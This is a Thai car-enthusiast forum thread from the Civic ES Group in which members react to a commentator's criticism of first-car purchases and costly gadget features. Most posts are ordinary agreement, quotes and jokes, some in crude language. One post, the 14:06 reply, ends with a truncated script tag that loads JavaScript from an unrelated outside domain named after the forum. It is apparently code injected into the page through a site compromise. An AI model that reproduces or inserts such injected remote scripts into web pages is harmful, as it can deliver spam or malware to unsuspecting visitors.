พุธ, 23 มกรา 2013 13:57 - แชร์กันเพียบ! รถคันแรก...จากมุมมอง พัฒนเดช กูรูเรื่องรถ
ถูกทุกอย่าง ผมก็ได้เตือนเพื่อนๆ ที่โทรมาถามเรื่องจากออกรถคันแรก ว่ามีความจำเป็นขนาดไหนรายได้เท่าไหร่
เงินเดือนได้มากน้อยขนาดไหน และค่าใช้จ่ายที่ต้องบำรุงรักษา อีกทั้งต้องมีเงินสำรองไว้บางส่วนเผื่อฉุกเฉิน
ทุกคนที่โทรมาปรึกษา ไม่ใครซื้อเลยสักคน

เพราะส่วนใหญ่คิดว่ามีสิทธิ์ก็ใช้สิทธิ์ ไม่ได้คิดว่าจำเป็นหรือป่าว
tokmun002


ชื่อเล่น: โอ

เข้าร่วม: 11 พฤษภาคม 2012
ตอบ: 1737

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 1331
ให้คำขอบคุณ: 1705

ที่อยู่: พระประแดง
ปี: 2001
สี: เทา ซิกเน็ต (เมทัลลิก) (RP-31M)
พุธ, 23 มกรา 2013 14:06 - แชร์กันเพียบ! รถคันแรก...จากมุมมอง พัฒนเดช กูรูเรื่องรถ
คนดีๆก็ต้องเปลี่ยนไปเห็นแก่ตัวเพราะสังคมที่เร่งรีบนี่แหละครับ. ! ลองทำอะไรให้มันช้าๆมั่งก็ได้ <script src="https://sport32news.com/civicesgroup.js"></
thammarong007


ชื่อเล่น: รงค์

เข้าร่วม: 23 ธันวา 2012
ตอบ: 1733

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 2672
ให้คำขอบคุณ: 3437

ที่อยู่: ซ.มังกร เทพารักษ์ สมุทรปราการ
ปี: 2003
สี: ทอง แซทเทิลไลท์ (NH-663M)
พุธ, 23 มกรา 2013 16:57 - แชร์กันเพียบ! รถคันแรก...จากมุมมอง พัฒนเดช กูรูเรื่องรถ
นี่แหละคือเหตุผลว่าทำไมผมถึงเลือก ES มือสอง ดูดี กว้างขวาง ที่สำคัญแร๊งงงง ขับไป ดูแลกันไป น่ารักจะตายจริงมั๊ย
ake_es


ชื่อเล่น: เอก

เข้าร่วม: 01 มิถุนา 2009
ตอบ: 838

Guru ES
Guru ES

ได้รับคำขอบคุณ: 710
ให้คำขอบคุณ: 244

ที่อยู่: ดอนเมือง
พุธ, 23 มกรา 2013 19:54 - แชร์กันเพียบ! รถคันแรก...จากมุมมอง พัฒนเดช กูรูเรื่องรถ
ไอระบบบ้า ๆ บอ ๆ ช่วยคุณจอด ถ้าคุณยังจอดรถไม่ได้คุณจะไปซื้อรถทำห่าอะไรวะ ระบบไฟฟ้าเปิดอัตโนมัติ มึงไม่รู้ว่ามันมืดแล้วมึงต้องเปิดไฟเหรอวะ กุญแจอัจฉริยะ หมุนกุญแจแค่นี้มึงจะตายเหรอ ...............ท่อนนี้อย่างโดนครับ
domziia


ชื่อเล่น: เจต

เข้าร่วม: 24 กุมภา 2012
ตอบ: 1246

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 1167
ให้คำขอบคุณ: 3865

ปี: 2005
สี: ดำ ไนท์ฮอว์ก (B-92P)
พุธ, 23 มกรา 2013 21:45 - แชร์กันเพียบ! รถคันแรก...จากมุมมอง พัฒนเดช กูรูเรื่องรถ
รถคันแรกของผม CIVIC ES ครับ    
kobkobok


ชื่อเล่น: กบ

เข้าร่วม: 09 กุมภา 2010
ตอบ: 3919

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 1738
ให้คำขอบคุณ: 290

ที่อยู่: สระบุรี
ปี: 2001
สี: เทา ซิกเน็ต (เมทัลลิก) (RP-31M)
พุธ, 23 มกรา 2013 22:30 - แชร์กันเพียบ! รถคันแรก...จากมุมมอง พัฒนเดช กูรูเรื่องรถ
ข้อคิดล้วนๆ
coco1340


เข้าร่วม: 11 มกรา 2012
ตอบ: 1239

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 1169
ให้คำขอบคุณ: 302

ที่อยู่: พระราม 2
พฤหัส, 24 มกรา 2013 00:34 - แชร์กันเพียบ! รถคันแรก...จากมุมมอง พัฒนเดช กูรูเรื่องรถ
  โลกมันอยู่ยากครับเดี่ยวนี้  เราเปลี่ยนโลกไม่ได้เราก็ต้องเปลี่ยนตัวเองงไปตามกระแสของสังคม 
CROW


เข้าร่วม: 31 ตุลา 2012
ตอบ: 90

สมาชิกสับสน
สมาชิกสับสน

ได้รับคำขอบคุณ: 33
ให้คำขอบคุณ: 137
พฤหัส, 24 มกรา 2013 01:12 - แชร์กันเพียบ! รถคันแรก...จากมุมมอง พัฒนเดช กูรูเรื่องรถ
สุดยอดเลย
ed02


เข้าร่วม: 25 ธันวา 2010
ตอบ: 564

แซงซ้าย ปาดขวา
แซงซ้าย ปาดขวา

ได้รับคำขอบคุณ: 467
ให้คำขอบคุณ: 635
พฤหัส, 24 มกรา 2013 11:52 - แชร์กันเพียบ! รถคันแรก...จากมุมมอง พัฒนเดช กูรูเรื่องรถ
เป็นความจริงที่หลายๆ คนมองข้ามไป
suttijate


ชื่อเล่น: เจตน์

เข้าร่วม: 04 เมษา 2012
ตอบ: 1099

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 1067
ให้คำขอบคุณ: 919

ที่อยู่: นนทบุรี
ปี: 2002
สี: ดำ ไนท์ฮอว์ก (B-92P)
พฤหัส, 24 มกรา 2013 14:57 - แชร์กันเพียบ! รถคันแรก...จากมุมมอง พัฒนเดช กูรูเรื่องรถ
"ผมพยายามบอกว่าคนไทยถูกหลอกว่าระบบโน้นดี ระบบนี้ดี คุณต้องการรถประหยัด แต่คุณไปซื้อรถที่มี mp3 เล่นซีดี กระจกขึ้นลงไฟฟ้าหมด ไม่มีความจำเป็นในการใช้รถเลย รถหนึ่งคันถ้าคุณถอดพวกนั้นหมดจากราคา 5 แสน เหลือไม่ถึง 4 แสน ไอระบบบ้า ๆ บอ ๆ ช่วยคุณจอด ถ้าคุณยังจอดรถไม่ได้คุณจะไปซื้อรถทำห่าอะไรวะ ระบบไฟฟ้าเปิดอัตโนมัติ มึงไม่รู้ว่ามันมืดแล้วมึงต้องเปิดไฟเหรอวะ กุญแจอัจฉริยะ หมุนกุญแจแค่นี้มึงจะตายเหรอ"

ประโยคนี้มันโดนจายยยยยยย
domziia


ชื่อเล่น: เจต

เข้าร่วม: 24 กุมภา 2012
ตอบ: 1246

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 1167
ให้คำขอบคุณ: 3865

ปี: 2005
สี: ดำ ไนท์ฮอว์ก (B-92P)
พฤหัส, 24 มกรา 2013 21:33 - แชร์กันเพียบ! รถคันแรก...จากมุมมอง พัฒนเดช กูรูเรื่องรถ
suttijate พิมพ์ว่า:
"ผมพยายามบอกว่าคนไทยถูกหลอกว่าระบบโน้นดี ระบบนี้ดี คุณต้องการรถประหยัด แต่คุณไปซื้อรถที่มี mp3 เล่นซีดี กระจกขึ้นลงไฟฟ้าหมด ไม่มีความจำเป็นในการใช้รถเลย รถหนึ่งคันถ้าคุณถอดพวกนั้นหมดจากราคา 5 แสน เหลือไม่ถึง 4 แสน ไอระบบบ้า ๆ บอ ๆ ช่วยคุณจอด ถ้าคุณยังจอดรถไม่ได้คุณจะไปซื้อรถทำห่าอะไรวะ ระบบไฟฟ้าเปิดอัตโนมัติ มึงไม่รู้ว่ามันมืดแล้วมึงต้องเปิดไฟเหรอวะ กุญแจอัจฉริยะ หมุนกุญแจแค่นี้มึงจะตายเหรอ"

ประโยคนี้มันโดนจายยยยยยย



ผมก็โดนกับประโยคนี้เหมือนกัน
ninenine


ชื่อเล่น: นาย

เข้าร่วม: 15 มกรา 2013
ตอบ: 481

แซงซ้าย ปาดขวา
แซงซ้าย ปาดขวา

ได้รับคำขอบคุณ: 339
ให้คำขอบคุณ: 644

ปี: 2005
สี: เทา ซิกเน็ต (เมทัลลิก) (RP-31M)
พฤหัส, 24 มกรา 2013 21:43 - แชร์กันเพียบ! รถคันแรก...จากมุมมอง พัฒนเดช กูรูเรื่องรถ
คันแรกผม ก็ ES เนี่ยแหละ สวยหล่้อ กว่าเยอะ อิอิ
blendz


ชื่อเล่น: เบนล์

เข้าร่วม: 08 พฤศจิกา 2012
ตอบ: 338

มีใบอนุญาตขับขี่
มีใบอนุญาตขับขี่

ได้รับคำขอบคุณ: 823
ให้คำขอบคุณ: 89

ที่อยู่: ดอนเมือง
ปี: 2005
สี: ดำ ไนท์ฮอว์ก (B-92P)
พฤหัส, 24 มกรา 2013 22:01 - แชร์กันเพียบ! รถคันแรก...จากมุมมอง พัฒนเดช กูรูเรื่องรถ
"รถหนึ่งคันถ้าคุณถอดพวกนั้นหมดจากราคา 5 แสน เหลือไม่ถึง 4 แสน ไอระบบบ้า ๆ บอ ๆ ช่วยคุณจอด ถ้าคุณยังจอดรถไม่ได้คุณจะไปซื้อรถทำห่าอะไรวะ ระบบไฟฟ้าเปิดอัตโนมัติ มึงไม่รู้ว่ามันมืดแล้วมึงต้องเปิดไฟเหรอวะ กุญแจอัจฉริยะ หมุนกุญแจแค่นี้มึงจะตายเหรอ "

ชอบประโยคนี้ ฮามาก
civic3025


ชื่อเล่น: เบิร์ด

เข้าร่วม: 03 พฤศจิกา 2010
ตอบ: 1266

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 1399
ให้คำขอบคุณ: 480

ที่อยู่: ชลบุรี.นครศรีธรรมราช
ปี: 2001
สี: ทอง ไทเทเนียม (เมทัลลิก) (YR-525M)
ศุกร์, 25 มกรา 2013 07:45 - แชร์กันเพียบ! รถคันแรก...จากมุมมอง พัฒนเดช กูรูเรื่องรถ
คนเราถ้า ก้าวกระโดด สูงเกินไปมันอาจจะหกล้มได้นะครับ

รัฐบาลก็เหมือนกัน ก้าวกระโดด เยอะๆเด๋วก็จะล้มไม่เป็นถ้าแน่ๆ
ตอบ
หน้า 1 จาก 1
ไปที่: 
ติดต่อโฆษณา admin@civicesgroup.com
Copyright © 2008-2025 Civic ES Group. All rights reserved.